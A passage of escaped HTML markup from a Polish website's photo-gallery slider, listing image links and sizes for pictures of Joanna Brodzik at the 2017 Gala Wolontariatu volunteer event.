href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (15)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-15.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item14\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-16.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (16)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-16-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-16-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-16-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-16.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item15\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (17)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-17.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item16\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (18)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-18.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item17\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (19)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-19.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item18\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (20)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-20.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item19\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (21)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-21.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item20\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (22)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-22.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item21\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (23)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-23.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item22\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (24)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-24.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item23\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (26)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-26.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item24\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-27.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (27)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-27-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-27-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-27-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-27.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item25\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-28.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (28)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-28-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-28-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-28-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-28.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item26\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-29.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (29)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-29-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-29-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-29-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-29.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item27\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (31)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-31.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item28\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (32)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-32.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item29\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (33)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-33.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item30\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (35)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-35.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item31\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-36.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (36)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-36-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-36-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-36-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-36.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item32\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (1)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-1.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item33\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2.jpg\" title=\"Gala Wolontariatu 2017, Joanna Brodzik (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/12\/Gala-Wolontariatu-2017-Joanna-Brodzik-2.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div 